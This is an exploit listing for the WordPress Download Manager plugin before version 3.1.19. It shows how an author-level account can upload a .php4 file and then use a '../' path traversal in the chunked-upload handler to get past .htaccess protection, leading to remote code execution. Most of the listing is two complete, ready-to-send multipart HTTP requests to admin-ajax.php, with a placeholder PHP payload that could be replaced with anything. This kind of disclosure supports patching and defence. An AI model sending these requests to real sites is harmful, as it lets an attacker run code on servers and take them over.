Exploit for Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE

Name: Exploit for Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE
Rating: 5 (188 reviews)
2021-04-30 | CVSS 7.0
## https://sploitus.com/exploit?id=WPEX-ID:4CA9F811-3461-4DEA-938F-1528440E2708
As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 518
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="test.php4"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4

Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler

POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 634
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="name"

../test.php4
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="whatever"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone